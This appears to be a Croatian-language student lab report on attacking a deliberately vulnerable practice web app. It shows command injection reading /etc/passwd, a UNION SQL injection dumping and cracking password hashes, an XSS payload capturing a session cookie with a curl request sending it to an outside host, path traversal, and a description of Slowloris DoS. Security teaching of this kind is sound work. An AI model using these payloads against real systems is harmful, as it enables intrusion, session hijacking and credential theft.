1)
1 | cat /etc/passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/bin/false
mysql:x:101:101:MySQL Server,,,:/nonexistent:/bin/false

2)
dodavanjem UNION možemo tražiti rezultate za druga polja iste tablice:

ID: ' OR '1'='1' UNION SELECT user, password FROM users where '1'='1 
First name: admin
Surname: admin
ID: ' OR '1'='1' UNION SELECT user, password FROM users where '1'='1 
First name: Gordon
Surname: Brown
ID: ' OR '1'='1' UNION SELECT user, password FROM users where '1'='1 
First name: Hack
Surname: Me
ID: ' OR '1'='1' UNION SELECT user, password FROM users where '1'='1 
First name: Pablo
Surname: Picasso
ID: ' OR '1'='1' UNION SELECT user, password FROM users where '1'='1 
First name: Bob
Surname: Smith
ID: ' OR '1'='1' UNION SELECT user, password FROM users where '1'='1 
First name: admin
Surname: 5f4dcc3b5aa765d61d8327deb882cf99
ID: ' OR '1'='1' UNION SELECT user, password FROM users where '1'='1 
First name: gordonb
Surname: e99a18c428cb38d5f260853678922e03
ID: ' OR '1'='1' UNION SELECT user, password FROM users where '1'='1 
First name: 1337
Surname: 8d3533d75ae2c3966d7e0d4fcc69216b
ID: ' OR '1'='1' UNION SELECT user, password FROM users where '1'='1 
First name: pablo
Surname: 0d107d09f5bbe40cade3de5c71e9e9b7
ID: ' OR '1'='1' UNION SELECT user, password FROM users where '1'='1 
First name: smithy
Surname: 5f4dcc3b5aa765d61d8327deb882cf99

username = pablo
md5 hash = 0d107d09f5bbe40cade3de5c71e9e9b7
password = letmein

3)

U Message polje unesemo:
<script>alert(document.cookie)</script>

Osvježavanjem stranice dobivamo vrijednosti cookiea:

PHPSESSID=ssv4ab8abfao7821v2t8ph59m7

Slanje GET zahtjeva:
curl http://public.tel.fer.hr/sui?cookie=security=low;%20PHPSESSID=ssv4ab8abfao7821v2t8ph59m7

Sprječiti XSS napade možemo:
	- zabranom određenih znakova
	- provjeravanjem unosa
	- sanitizacijom unosa

4)
Šaljemo HTTP GET zahtjev:
http://192.168.56.101/vulnerabilities/fi/?page=../../../../../etc/passwd

Ispis:
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/bin/false mysql:x:101:101:MySQL Server,,,:/nonexistent:/bin/false

Napad je moguće izvršiti jer server samo izvršava ili ispisuje datoteku koja se navede u URL-u.

Zaštita od ovakvog napada se radi provjerom putanje koja se predaje.

5)
Alat Slowloris izvodi DOS(Denial of Service) napad tako da otvara veliki broj konekcija prema serveru kojeg napada i drži ih otovorenim duži period vremena. Server će tako biti u nemogućnosti otvarati nove konekcije i posluživati stvarne zahtjeve.

